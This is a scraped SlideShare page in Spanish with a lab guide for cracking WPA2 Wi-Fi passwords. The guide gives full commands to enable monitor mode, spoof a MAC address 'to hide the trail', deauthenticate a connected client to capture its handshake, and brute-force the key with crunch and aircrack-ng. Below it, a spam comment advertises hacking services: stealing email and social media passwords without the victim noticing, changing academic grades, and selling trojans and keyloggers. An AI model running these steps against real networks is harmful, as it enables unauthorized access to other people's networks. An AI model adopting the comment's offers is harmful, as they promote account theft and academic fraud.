Laboratorio hacking de contraseñas wpa2 en redes wlan

2,590 views

Published on

Laboratorio hacking de contraseñas wpa2 en redes wlan

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • Servicios de contraseñas de correos electrónicos: SERIEDAD EN EL SERVICIO 100%

    Live, Hotmail, Gmail, Yahoo, Redes Sociales (Twitter, Facebook)

    Si deseas obtener la contraseña de lo mencionado contrata nuestro servicio.

    DISCRECION Y SERIEDAD, la victima jamás notara que esta siendo intervenido.

    Cambio de Calificaciones, Exámenes y Oposiciones de Instituciones públicas o privadas.

    Asesoría en Redes y Sistemas, Hacker's Profesionales.

    Aseguramos un trabajo serio privado.

    SOLUCION INMEDIATA
    CONTACTA SOLAMENTE: kleim89@hotmail.com

    ESPECIALISTAS EN SISTEMAS INFORMATICOS




    Especialista informático Profesional, CONTRASEÑAS DE HOTMAIL YAHOO GMAIL, FACEBOOK.

    Ofrezco Servicio en el Área de Seguridad Informática:

    - Contraseñas Hotmail, Yahoo, Gamil; Facebook, Aol y de servidores privados.
    - Cambio de Notas Universidad e historial académico.
    - Programas de Hacking, Cracking, Brute Forcer , Troyanos ,keyloggers y Sniffers , AntiSpyware .

    Servicio técnico informático: soporte remoto, asistencia técnica presencial y mantenimiento informático.

    CONTACTENOS: kleim89@hotmail.com
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Views
Total views
2,590
On SlideShare
0
From Embeds
0
Number of Embeds
548
Actions
Shares
0
Downloads
48
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

Laboratorio hacking de contraseñas wpa2 en redes wlan

  1. 1. Laboratorio Hacking de Contraseñas WPA2 en Redes WLANDuración60 MinutosRequisitos 1. Computador con Tarjeta de Red Wireless LAN. 2. Sistema Operativo GNU/Linux (Recomendación Backtrack). Valido en entorno de Virtualización 3. Aplicativos Instalados: aircrack-ng, macchanger y crunch.Nota: Si se hace uso de un entorno de virtualización se requiere de un adaptador Wireless LANUSB. Dado que las maquinas virtuales crean sus adaptadores de red como interfaces Ethernet.Desarrollo1. Abrir una terminal de comandos.2. Autenticarnos como súper usuario o root. Usando el comando su –3. Ejecutamos el comando iwconfig para listar las interfaces con soporte para conexiones inalámbricas WLAN.4. Ejecutamos el comando airmon sobre la interfaz de red WLan0 con el propósito de habilitar el modo monitor en esta. Comando a ejecutar: airmon-ng start wlan05. Si deseamos podemos falsificar nuestra dirección MAC para ocultar el rastro. Esto lo hacemos ejecutando los comandos: a. ifconfig mon0 down b. macchanger -m 00:11:22:33:44:55 mon0 c. ifconfig mon0 up6. Iniciamos el proceso de monitoreo de redes inalámbricas usando el comando airodump como se presenta a continuación. a. airodump-ng mon07. airodump permite detectar la víctima, hacemos que nuestra interfaz de red inalámbrica solo escuche dicha red. a. airodump-ng -c 11 --bssid MacDelRouter -w nombre_archivo_guardar mon0 (no cerrar)8. El siguiente paso consiste en capturar el handshake de algún equipo conectado a la red, razón por la cual este tipo de ataque realmente no ataca al router inalámbrico sino a algún cliente conectado a la red. El proceso de captura del handshake busca desconectar a un equipo Jesse Padilla Agudelo http://arpanetblog.com
  2. 2. presente en la red inalámbrica y esperar que este se conecte de nuevo y envié su handshake. Esto lo realizamos ejecutando el comando. a. aireplay-ng -0 20 -a MacDelRouter -c MacDelEquipoConectadoAEstaRed mon09. Comprobar si capturamos el handshake, sino repetimos el paso anterior a. aircrack-ng nombre_archivo_guardar.cap10. Al obtener el handshake procedemos a realizar ataque de fuerza bruta a este, este básicamente busca tratar de generar con los datos obtenidos en los pasos anteriores un handshake similar probando diferentes tipos de contraseñas. a. crunch 8 9 abc + 123 | aircrack-ng -a 2 nombre_archivo_guardar.cap -e [nombre de la red] -b MacDelRouter -w -Nota: Como podemos observar la clave para que este proceso sea exitoso es que la red cuente conusuarios conectados de resto los resultados serán inviables por este método. A continuación sepresenta la topología de red para realizar este ataque. Jesse Padilla Agudelo http://arpanetblog.com

×